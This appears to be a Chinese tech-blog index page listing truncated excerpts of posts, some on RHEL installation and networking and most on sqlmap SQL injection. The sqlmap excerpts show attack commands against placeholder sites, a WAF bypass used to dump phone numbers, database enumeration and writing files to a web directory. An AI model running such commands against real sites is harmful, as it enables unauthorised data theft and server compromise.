51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

开源工具

安装RHEL8.x操作系统

安装RHEL8.x操作系统

厉飞雨 阅读(315) 评论(0) 赞(17)

安装与配置VM虚拟机 {#heading-1} ======================= 1. 成功安装VMware Workstation后的界面如下图所示。 ![安装RHEL8.x操作系统-1.png](/upload/安装RHEL8.x操作系统-1.png) 2. 在上图所示的界面中,单击"创建新的虚拟机"选项,并在弹出的"新建虚...

RHEL8.0安装ansible

RHEL8.0安装ansible

厉飞雨 阅读(535) 评论(0) 赞(16)

[Ansible的介绍](https://51tbox.com/) 需先有一台RHEL8.x服务器,才能执行以下安装。 有网情况 {#heading-1} ----------------- ### 配置yum源 {#heading-2} 方法一:本地yum源 #挂载RHEL8.x光盘镜像到/mnt [root@ljh99 ~]# mount ...

如何在 RHEL 上通过绑定配置 VLAN 标记

如何在 RHEL 上通过绑定配置 VLAN 标记

厉飞雨 阅读(544) 评论(0) 赞(15)

[![](/data/attachment/album/202401/30/154618igt5zj2dwgfax2th.jpg)](/data/attachment/album/202401/30/154618igt5zj2dwgfax2th.jpg) 在 Linux 中,你可以根据自己的需要创建高级网络设置,如 网络绑定 Network Bonding 或 网卡聚合 NI...

sqlmap 盲注速度提升小笔记

sqlmap 盲注速度提升小笔记

厉飞雨 阅读(365) 评论(0) 赞(15)

最近遇到个盲注点,有个360防火墙,绕了半天只能用 rlike 脱裤,奈何速度巨慢,五分钟一个数字,没法忍. 经过各种折腾,最终打到1秒两三个手机号的效果,记录下折腾的问题,也希望能帮助到同样遇到问题的童鞋. 第一步(提升SQLMAP 线程数): `\lib\core\settings.py` 找到 sqlmap 的这个文件,搜索 MAX_NUMBER_OF_THREA...

sqlmap:mssql注入

sqlmap:mssql注入

厉飞雨 阅读(376) 评论(0) 赞(15)

```bash 1.判断注入点,获取网站信息 sqlmap.py -u http://www.xx.com/ss.asp?id=123 例: sqlmap.py -u "http://www.xx.com/ss.asp?id=123" 2.获取所有数据库 sqlmap.py -u http://www.xx.com/ss.asp?id=123 ...

sqlmap:file参数使用

sqlmap:file参数使用

厉飞雨 阅读(482) 评论(0) 赞(18)

```bash 权限:必须为dba权限 file-write 从本地写入 file-dest 写入目标路径 判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是) sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba 写入文件至站点目录 sq...

sqlmap:Cookie中转注入

sqlmap:Cookie中转注入

厉飞雨 阅读(463) 评论(0) 赞(15)

注:此方法使用于access数据库,mysql、MSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysql、MSSQL注入一样,只不过在后面加上了"--level 2"这个参数,其他参数照常使用。 ```bash 判断数据库,获取服务器,网站环境等参数 sqlmap.py -u http://www.xx.com/show.asp --co...

sqlmap:Access数据库注入思路

sqlmap:Access数据库注入思路

厉飞雨 阅读(512) 评论(0) 赞(17)

1.判断注入的是否存在注入漏洞 --------------- ```bash sqlmap -u "http://www.xxx.com/xx.asp?id=xxx" root@huc:~# sqlmap -u(-u:指定一个URL) "http://www.xxx.com/xx.asp?id=xxx" ``` 2.获取表名 ---...

Sqlmap注入技巧

Sqlmap注入技巧

厉飞雨 阅读(363) 评论(0) 赞(15)

php+mysql注入方法:http://tieba.baidu.com/p/3723202169 http://www.cnblogs.com/Javame/p/3753060.html sqlmap命令大全 1:access注入 猜解表名 and exists (select \* from admin) 猜解列名 and exists(select userna...

SQLmap注入笔记

SQLmap注入笔记

厉飞雨 阅读(379) 评论(0) 赞(21)

sqlmap.py -u "url" --tables 列出数据库中的表 ( --tables:列出表) sqlmap.py -u "url" -T 表 --columns 列出表中字段 -D:指定数据库名称 -T:指定要列出字段的表 --columns:指定列出字段 sqlmap.py -u "url" ...